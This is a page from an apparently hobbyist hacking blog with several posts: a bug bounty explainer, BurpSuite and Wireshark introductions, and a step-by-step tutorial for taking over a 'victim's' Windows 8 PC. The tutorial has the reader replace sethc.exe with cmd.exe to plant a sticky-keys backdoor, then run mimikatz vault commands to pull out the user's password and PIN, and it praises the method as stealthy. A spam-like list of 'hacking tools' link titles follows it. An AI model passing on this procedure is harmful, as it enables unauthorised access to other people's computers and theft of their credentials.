Sunday, August 30, 2020

$$$ Bug Bounty $$$

What is Bug Bounty ?



A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.




Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.


Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.


While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

More articles


Posted by at No comments:

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)
More information
  1. Hackrf Tools
  2. Easy Hack Tools
  3. Hacker Tools Software
  4. Hack Tools For Games
  5. Pentest Tools Website
  6. Hacking Tools Software
  7. Install Pentest Tools Ubuntu
  8. Hack Tools For Games
  9. Hacker Tools Hardware
  10. Hacking Tools Usb
  11. Hacking Tools Name
  12. Hacking Tools 2019
  13. Hacking Tools For Windows
  14. Kik Hack Tools
  15. What Are Hacking Tools
  16. Pentest Tools Framework
  17. Hacker Tools List
  18. Termux Hacking Tools 2019
  19. Hackrf Tools
  20. Hacker Tools Apk Download
  21. Hack Tools
  22. Nsa Hacker Tools
  23. Hacking Tools For Beginners
  24. Hacker Tools Windows
  25. Pentest Tools Website
  26. Hack Tools
  27. Pentest Tools Framework
  28. Hack Tools For Windows
  29. Hack Tools For Windows
  30. What Is Hacking Tools
  31. Hacker Tools Github
  32. What Is Hacking Tools
  33. Pentest Tools Find Subdomains
  34. Pentest Tools For Ubuntu
  35. Pentest Tools Download
  36. Pentest Tools Free
  37. Pentest Tools Framework
  38. Game Hacking
  39. Hack Tools For Pc
  40. Hacking App
  41. Beginner Hacker Tools
  42. Hacker Tools List
  43. New Hacker Tools
  44. Hacker Tool Kit
  45. Blackhat Hacker Tools
  46. Pentest Box Tools Download
  47. Hacking Tools For Pc
  48. Nsa Hack Tools
  49. Hackrf Tools
  50. Hacking App
  51. Hacking Tools Kit
  52. Pentest Tools List
  53. Hacker Tools Github
  54. Hack Rom Tools
  55. World No 1 Hacker Software
  56. Pentest Reporting Tools
  57. Tools For Hacker
  58. Free Pentest Tools For Windows
  59. Pentest Tools Nmap
  60. Blackhat Hacker Tools
  61. Hacking Tools For Windows Free Download
  62. How To Make Hacking Tools
  63. Hack Tools For Games
  64. Hack Tools For Games
  65. Pentest Tools Find Subdomains
  66. Easy Hack Tools
  67. Termux Hacking Tools 2019
  68. Pentest Tools Apk
  69. Hacker Tools For Windows
  70. How To Install Pentest Tools In Ubuntu
Posted by at No comments:

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.

More information


Posted by at No comments:

Saturday, August 29, 2020

Networking | Routing And Switching | Tutorial 2 | 2018


Welcome to my 2nd tutorial of the series of networking. In this video I've briefly described peer to peer network (P2P). Moreover, you'll see how to make a peer to peer network? How it's working? How we can intercept traffic over the network by using Wireshark? and many more. Wireshark tool is integrated with eNSP so it'll be installed automatically when you install the eNSP. On the other hand, you can install the Wireshark for your personal use from its website.

What is Peer to Peer (P2P) network? 

As when devices are connected with each other for the sake of communication that'll be known as a Network. Now what is peer to peer network? In P2P network each and every device is behaving like a server and a client as well. Moreover They are directly connected with each other in such a way that they can send and received data to other devices at the same time and there is no need of any central server in between them.

There is a question that mostly comes up into our minds that  Is it possible to capture data from the network? So the answer is yes. We can easily captured data from the network with the help of tools that have been created for network troubleshooting, so whenever there will be some issues happening to the network so we fixed that issues with the help of tools. Most usable tool for data capturing that every network analyst used named Wireshark but there are so many other tools available over the internet like SmartSniff, Ethereal, Colasoft Capsa Network Analyze, URL Helper, SoftX HTTP Debugger and many more.

What is Wireshark?

Wireshark is an open source network analyzer or sniffer used to capture packets from the network and tries to display the brief information about the packets. It is also used for software and communication protocol development. Moreover, Wireshark is the best tool to intercept the traffic over the network.